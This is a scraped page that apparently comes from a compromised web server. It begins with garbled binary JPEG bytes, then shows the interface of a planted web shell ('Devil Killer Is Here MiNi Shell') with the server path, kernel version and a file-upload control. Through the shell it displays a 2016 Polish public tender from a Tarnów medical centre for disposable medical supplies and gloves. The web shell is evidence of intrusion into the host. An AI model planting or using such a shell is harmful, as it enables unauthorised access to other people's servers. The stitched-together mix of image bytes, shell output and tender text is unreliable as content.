JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160525/133486-N-2016.html

<p class="kh_header"><b>Tarnów: DOSTAWA MATERIAŁÓW MEDYCZNYCH I SPRZĘTY JEDNORAZOWEGO UŻYTKU DLA MOŚCICKIEGO CENTRUM MEDYCZNEGO SPÓŁKA Z OGRANICZONA ODPOWIEDZIALNOŚCIĄ</b><br>
<b>Numer ogłoszenia: 133486 - 2016; data zamieszczenia: 25.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Mościckie Centrum Medyczne Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kwiatkowskiego 15, 33-101 Tarnów, woj. małopolskie, tel. 14 68 80 511, faks 14 68 80 511.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www@www.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: mościckie Centrum Medyczne sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MATERIAŁÓW MEDYCZNYCH I SPRZĘTY JEDNORAZOWEGO UŻYTKU DLA MOŚCICKIEGO CENTRUM MEDYCZNEGO SPÓŁKA Z OGRANICZONA ODPOWIEDZIALNOŚCIĄ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lp.NAZWA MATERIAŁU	J.M.	Ilość 
1.IGŁA  0,4X nie mniej niż 19mm i nie więcej niż 20 mm , a100 SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą Op.5
2.IGŁA  0,5X25 A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą OP.	20
3.IGŁA 0,6X30  A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą OP.	10
4.IGŁA 0,7X40  A100SZT. Terumo pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.100
5.IGŁA O,8X40 A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.45
6.IGŁA 0,9X40  A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą OP.	50
7. IGŁA1,1X40   A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą OP.	5
8.IGŁA 0,5X16  A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą OP.	2
9.IGŁA0,9X50   A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą OP.	2
10	IGŁA 1,2X40   A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą OP.	35
11.IGŁA DO WSTRZYKIWACZY INSULINOWYCH JAŁOWE 0,30X8MM pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą SZT.	800
12.STRZYKAWKA  100ML JAŁOWA  NIEPIROGENNA do płukania uszu z łagodnym zakończeniem TYPU POLFA	SZT.	1800
13.STRZYKAWKA 2 CZĘŚCIOWA  2ML A 100SZT 
 kontrastujący tłok
rozszerzona skala min.20proc.
pojedyncza skala pomiarowa		OP.	65
14	STRZYKAWKA 2 CZĘŚCIOWA  5ML A 100SZT  
kontrastujący tłok 
rozszerzona skala min.20proc.
pojedyncza skala pomiarowa	OP.	50
15	STRZYKAWKA  2 CZĘŚCIOWA  10ML A 100SZT 
 kontrastujący tłok
rozszerzona skala min.20proc.
pojedyncza skala pomiarowa	OP.	15
16	STRZYKAWKA  2 CZĘŚCIOWA  20 ML.A 100SZ 
 kontrastujący tłok 
rozszerzona skala min.20proc.
-pojedyncza skala pomiarowa	OP.	30
17	STRZYKAWKA do pompy infuzyjnej NIE MNIEJ NIŻ 50ML. I NIE WIĘCEJ NIŻ 60 ML.	SZT.	10
18	FARTUCH FLIZOLINOWY 1X UŻYTKU a 10 szt Op .	20
19	Fartuch foliowy  a 100 szt.	Op.	30
20	PRZEŚCIERADŁO FLIZELINOWE 1X UŻYTKU NIE MNIEJSZE NIŻ 210X140 pakowane po 10szt.	Op.	60
21	MASECZKA 1XUŻYTKU FLIZELINOWA Z GUMKĄ a 50szt.	Op.	30
22	MOTYLKI 22G	SZT.	100
23	VENFLON 0,6 wykonany z poliuretanu, posiadający min. 3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu	SZT.	50
24	VENFLON 0,7 wykonany z poliuretanu, posiadający min. 3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu	SZT.	300
25	VENFLON 0,9 wykonany z poliuretanu, posiadający min.3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu	SZT.	600
26	VENFLON 1,1 wykonany z poliuretanu, posiadający min.3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu
	SZT.	300
27	VENFLON 1,3 wykonany z poliuretanu, posiadający min.3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu	SZT.	200
28	KORECZEK DO VENFLONU może posiadać trzpień zamykający światło kaniuli znajdujące się powyżej krawędzi koreczka.	SZT.	1000
29	Zamknięty system dostępu naczyniowego bezigłowy, bez metalowych oraz wewnetrzynych mechanicznych części, bez lateksu, umożliwiający połączenia typu Luer zapewniający używanie do 7 dni.	Szt.	100
30	KRANIK TRÓJDROŻNY DO VENFLONU	SZT.	
31	ZATYCZKA DO CEWNIKA TYPU FOLLEY UNIWERSALNA POSIADAJĄCA  UCHWYT UŁATWIAJĄCY  PRAWIDŁOWE UMIESZCZENIE GO W ODPOWIEDNIM MIEJCSU	SZT.	100
32	PRZEDŁUŻACZ DO POMPY INFUZYJNEJ NIE KRÓTSZY NIŻ 120 CM JAŁOWY NIEPIROGENNY, NIETOKSYCZNY	SZT.	50
33	CEWNIK DO PODAWANIA TLENU PRZEZ NOS DLA DOROSŁYCH	SZT.	50
34	CEWNIK DO ODSYSANIA DLA DOROSŁYCH 	SZT.	1500
35	CEWNIK ZEWNĘTRZNY Urologiczny NR 25	SZT.	10
36	DREN DO MASKI TLENOWEJ	SZT.	10
37	KANKA DOODBYTNICZA DLA DOROS.NR 24	SZT.	50
38	ZGŁĘBNIK ŻOŁĄDKOWY DLA DOROS. CH 18 nie krótsze niż 800 mm	SZT.	50
39	ZGŁĘBNIK ŻOŁĄDKOWY DLA DOROS.CH 16	SZT.	20
40	CEWNIK TYPU FOLLEYA NR 06	SZT.	5
41	CEWNIK TYPU FOLLEYA NR 08	SZT.	5
42	CEWNIK TYPU FOLLEYA NR 10	SZT.	5
43	CEWNIK TYPU FOLLEYA NR 12	SZT.	5
44	CEWNIK TYPU FOLLEYA NR 16	SZT.	70
45	CEWNIK TYPU FOLLEYA NR 18	SZT.	80
46	CEWNIK TYPU FOLLEYA NR 20	SZT.	20
47	CEWNIK TYPU FOLLEYA NR 22	SZT.	50
48	CEWNIK TYPU FOLLEYA NR 24	SZT.	70
49	CEWNIK TYPU FOLLEYA NR 26	SZT.	40
50	CEWNIK TYPU FOLLEYA NR 30	SZT.	20
51	KAPTUREK JEDNORAZOWY PLASTIKOWY DO TERMOMETRU Brown a 40 szt.	Op.	12
52	WOREK UROLOGICZNY 2L. jałowy	SZT.	500
53	WOREK UROLOGICZNY 750 ML. jałowy	SZT.	10
54	KIELISZKI JEDNORAZOWE NA LEKI a 75 szt.	OP.	150
55	Wziernik do otoskopu Heine Mini 3000-jednorazowy plastikowy  4 mm	SZT.	2000
56	Wziernik do otoskopu Heine Mini 3000-jednorazowy plastikowy  2,5 mm	SZT.	2000
57	PASKI DO STER.PARĄ WODNĄ DO PAKIETU  V klasy a100szt.	OP.	200
58	TAŚMA DO STER.PARĄ WODNĄ NA PAKIET a 1szt.	OP.	4
59	TOREB.PAPIER.FOLIA SAMOP.90x230a100szt.	OP.	3
60	TOREB.PAPIER.FOLIA SAMOP. 90x203a100szt.	OP.	3
61	TOREB.PAPIER.FOLIA SAMOP.130x250 a100szt.	OP.	3
62	TOREB.PAPIER.FOLIA SAMOP.90x130 a100szt.	OP.	3
63	SZPATUŁKI  DO JĘZYKA drewniane A 100SZT.	OP.	100
64	PENSETY JEDNORAZ. jałowa	SZT.	120
65	KUBKI NA MOCZ JAŁOWE nie mniej niż 100ML.Z ZAKRETKĄ	SZT.	300
66	APARAT DO KROPÓWKI posiadające komorę wolną od PCV oraz pozbawione ftalanów	SZT.	2000
67	SCALPEL JAŁOWY OSTRZE + UCHWYT NR 11SZT.	20
68	SCALPEL JAŁOWY OSTRZE + UCHWYT NR 12SZT.	20
69	SCALPEL JAŁOWY OSTRZE + UCHWYT NR 13SZT	20
70	OSTRZA STERYLNE WYMIENNE NR. 24 nie wymagany grawer z nazwą producenta na ostrzu 	OP.	2
71	OSTRZA STERYLNE WYMIENNE NR. 13 nie wymagany grawer z nazwą producenta na ostrzu	OP.	2
72	OSTRZA STERYLNE WYMIENNE NR. 23 nie wymagany grawer z nazwą producenta na ostrzu	OP.	2
73	OSTRZA STERYLNE WYMIENNE NR. 12 Z ZAKRZWIONYM OSTRZEM nie wymagany grawer z nazwą producenta na ostrzu	OP.2
Pakiet nr 2.
l.p.	NAZWA ASORTYMENTU	J.M.	Ilość 
1	Rękawice lateksowe diagnostyczne , pudrowe XS przeznaczone dla minimum średniego zagrożenia a 100 szt.   	OP.	10
2	Rękawice lateksowe, diagnostyczne, pudrowane S  przeznaczone dla minimum średniego zagrożenia a100 szt.	Op.	40
3	Rękawiczki lateksowe diagnostyczne, pudrowane  M przeznaczone dla minimum średniego zagrożenia a100 szt.	Op.	150
4	Rękawiczki lateksowe diagnostyczne, pudrowane L przeznaczone dla minimum średniego zagrożenia a100 szt.	Op.	180
5	Rękawice winylowe bezpudrowe S a100 szt. przeznaczone dla minimum średniego zagrożenia	OP.	80
6	Rękawice winylowe bezpudrowe M przeznaczone dla minimum średniego zagrożenia a100szt.	OP.	500
7	Rękawice winylowe bezpudrowe L przeznaczone dla minimum średniego zagrożenia a100szt.	OP.	150 
8	Rękawiczki pudrowane , lateksowe, chirurgiczne jałowe nr 8 pakowane po 2 szt.	PAR	200
9	Rękawiczki pudrowane , lateksowe, chirurgiczne jałowe sterylne 7,5 pakowane po 2 szt.	PAR.	2
10	Rękawice pudrowane , lateksowe, chirurgiczne jałowe sterylne 6,5 pakowane po 2 szt.	PAR.	100
11	Rękawiczki nitrylowe S  bezpudrowe, diagnostyczne a 100szt.	OP.	230
12	Rękawiczki nitrylowe M  bezpudrowe, diagnostyczne a 100szt.	OP.	870
13	Rękawiczki nitrylowe L  bezpudrowe, diagnostyczne a100szt.	OP.	270
	razem		
Pakiet nr 3.
	NAZWA MATERIAŁU	J.M	Ilość 
1	POJEMN. NA ODP.MED. 10 L. PLASTIK	SZT.	150
2	POJEMN.NA ODP. MED.20L. PLASTIK	SZT.	20
3	POJEMN.NA ODP.MED.5L.PLASTIK	SZT.	150
4	POJEMN.NA ODP.MD.3,5L.PLASTIK	SZT.	70
5	POJEMN.NA ODP.MED. 2 L.PLASTIK o wysokości nie mniej niż 20 cm i nie więcej niż 23 cm	SZT.	150
6	POJEMN.NA ODP.MED. 2 L.PLASTIK o wysokości nie mniej niż 14 cm i nie więcej niż 16 cm.		300
7	POJEMN.NA ODP.MED. 1 L.PLASTIK	SZT.	50
8	POJEMN.NA ODP.MED. 0,7 L. PLASTIK	SZT.	30
9	POJEMN.NA ODP.MED 0,2 l. PLASTIK	SZT.	10
10	PUDEŁKA NA ODPADY 4L. TEKTURA	SZT.	10
	razem		
Pakiet nr 4
LP	Materiały diagnostyczne	j.m.	ilość
1	SZKIEŁKA NAKRYWKOWE 24X50 MM TYPU MENZEL a 100 SZT.	OP.	20
2	SZKIEŁKA PODSTAWOWE Z BIAŁYM POLEM TYPU MENZEL a50SZT.	OP.	25
3	ŻEL DO USG A 500ML.	SZT	100
4	ŻEL DO USG NIE GORSZY NIŻ SONOGEL A 5l z pompką do aparatu LOGIQ 5 Expert	szt.	8
5	PAPIER DO EKG A4 112X25 Z NADRUKIEM do aparatu ASCARD	ROL	130
6	PAPIER DO EKG A3 104X40 Z NADRUKIEM do aparatu ASCARD	ROL	20
7	WZIERNIKI GINEKOLOGICZNE XS	SZT.	500
8	WZIERNIKI GINEKOL. S TYPU CUSCO	Szt.	800
9	SZCZOTECZKA DO WYM.CYTOLOG.A 100SZT okrągła jałowa	OP.	10
10	SZCZOTECZKA DO WYM.CYTOLOG.A 100SZT wachlarz jałowa 	OP.	2
11	PAT.DO POB. WYM.CYTOLOGICZNYCH .A 100 SZT. PLASTIKOWE JAŁOWE Z WACIKIEM nie krótsze niż 210mm.	OP.	15.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;
b) posiadania wiedzy i doświadczenia;
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;
d)  sytuacji ekonomicznej i finansowej.
W ramach tego warunku Wykonawca zobowiązany jest do przedłożenia:
- opłaconej aktualnej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 50.000,00 złotych;
lub
- informacji (opinii) banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na kwotę 10.000,00 wystawioną nie wcześniej niż 3 m-ce przed upływem terminu składania ofert;
Ocena spełniania powyższego  warunku udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie dokumentów  Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;
b) posiadania wiedzy i doświadczenia;
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;
d)  sytuacji ekonomicznej i finansowej.
W ramach tego warunku Wykonawca zobowiązany jest do przedłożenia:
- opłaconej aktualnej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 50.000,00 złotych;
lub
- informacji (opinii) banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na kwotę 10.000,00 wystawioną nie wcześniej niż 3 m-ce przed upływem terminu składania ofert;
Ocena spełniania powyższego  warunku udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie dokumentów  Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;
b) posiadania wiedzy i doświadczenia;
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;
d)  sytuacji ekonomicznej i finansowej.
W ramach tego warunku Wykonawca zobowiązany jest do przedłożenia:
- opłaconej aktualnej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 50.000,00 złotych;
lub
- informacji (opinii) banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na kwotę 10.000,00 wystawioną nie wcześniej niż 3 m-ce przed upływem terminu składania ofert;
Ocena spełniania powyższego  warunku udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie dokumentów  Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;
b) posiadania wiedzy i doświadczenia;
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;
d)  sytuacji ekonomicznej i finansowej.
W ramach tego warunku Wykonawca zobowiązany jest do przedłożenia:
- opłaconej aktualnej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 50.000,00 złotych;
lub
- informacji (opinii) banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na kwotę 10.000,00 wystawioną nie wcześniej niż 3 m-ce przed upływem terminu składania ofert;
Ocena spełniania powyższego  warunku udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie dokumentów  Wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

